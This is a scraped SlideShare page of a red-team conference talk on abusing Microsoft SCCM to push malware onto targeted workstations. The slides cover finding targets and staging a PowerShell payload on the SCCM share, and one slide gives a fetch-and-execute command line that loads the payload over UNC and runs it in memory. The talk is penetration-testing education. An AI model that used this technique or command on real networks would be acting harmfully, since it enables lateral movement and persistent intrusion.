Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Red Team Upgrades:
Using SCCM for Malware Deployment
@enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive
Threat Division (ATD) of Veris Group
❖ Active developer on...
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration
Manager (SC...
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
server
❖ This talk is focused on abusing SCCM for late...
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts ar...
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups...
Right Click Tools
❖ Add-On that can be installed to assist in client
management tasks
❖ Should be installed on a client su...
Yep...
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed ...
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out i...
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups fo...
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for
payload delivery and execution
❖ Do ...
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
your payload
➢ cmd.exe /c “powershel...
Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enig...
References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targ...
Red team upgrades   using sccm for malware deployment
Red team upgrades   using sccm for malware deployment
Upcoming SlideShare
Loading in …5
×

Red team upgrades using sccm for malware deployment

3,845 views

Published on

Matt Nelson - Veris Group's Adaptive Threat Division

Published in: Internet
  • Be the first to comment

Red team upgrades using sccm for malware deployment

  1. 1. Red Team Upgrades: Using SCCM for Malware Deployment
  2. 2. @enigma0x3 ❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group ❖ Active developer on the PowerShell Empire project ❖ Offensive PowerShell advocate ❖ 2nd time speaking! ❖ This con is probably older than I am ❖ Indiana corn farmer turned h4x0r (not really)
  3. 3. ❖ What is SCCM and how some admins fail at securing it ❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise. ➢ I’m going to cover targeted, strategic use as opposed to mass pwnage What this is...
  4. 4. Setting the Stage ❖ This talk assumes you have RDP access to a SCCM server ❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM. ❖ No, having access to SCCM does not mean you own the enterprise ❖ If you administer SCCM as a domain admin, you fail.
  5. 5. What is SCCM? ❖ Platform for distributing packages/applications to clients ❖ Packages, applications and install scripts are hosted on the SCCM server ❖ Setup and maintained via an agent/server architecture ❖ Consists of a central site server with distribution points. ➢ Agents check in to server periodically to obtain new packages/applications ❖ Basically acts as internal RAT/C2
  6. 6. SCCM in the enterprise ❖ 1 central site server with multiple distribution points ❖ Typically managed via controlled groups ➢ e.g. “SCCM Admins” in AD ❖ Typically setup/configured using a service account to run the application/push updates ❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share ❖ Admins gonna admin
  7. 7. Right Click Tools ❖ Add-On that can be installed to assist in client management tasks ❖ Should be installed on a client such as an administrative workstation...not on the server ➢ Admins install it on the server anyways ❖ Enables full control of managed endpoints
  8. 8. Yep...
  9. 9. Why use SCCM in Red Teaming? ❖ Manages a ton of distributed clients ➢ Take control of the server and you have distributed workstation control ➢ SCCM agents are just waiting to run your code ❖ Live off of the land ➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution ➢ Looks like normal day-to-day traffic/activity ➢ To limit the risk of getting caught, become an admin and not a typical adversary
  10. 10. Why use SCCM in Red Teaming? (cont) ❖ Allows you to identify and strategically group targets ➢ Able to push implants out in a very controlled and surgical manner ❖ Also acts as a persistence mechanism
  11. 11. Abusing SCCM: Hunting ❖ Some organizations have user->device mapping ➢ This allows for admins to create specific groups for departments ❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
  12. 12. Abusing SCCM: Compromise ❖ Create an application/package that utilizes PowerShell for payload delivery and execution ❖ Do so by creating a PowerShell payload and throw it up on the public share SCCM uses (typically something like sccmsource)
  13. 13. Abusing SCCM: Compromise ❖ Create a script installer application to fetch and execute your payload ➢ cmd.exe /c “powershell.exe -c “gc serverNamesharedFolderApplicationFolderpayload.txt | iex”” ❖ Deploy the application to your target group and wait for the SCCM agents to check in ➢ Payload is fetched over UNC and runs in memory ❖ More here: ➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation- compromise-with-sccm/
  14. 14. Questions and Contact ❖ Feel free to hit me up! ❖ enigma0x3 [at] gmail [dot] com ❖ @enigma0x3 on Twitter and Github ❖ enigma0x3 on Freenode: #psempire ❖ Blog: enigma0x3.wordpress.com
  15. 15. References ❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf ❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation- compromise-with-sccm/

×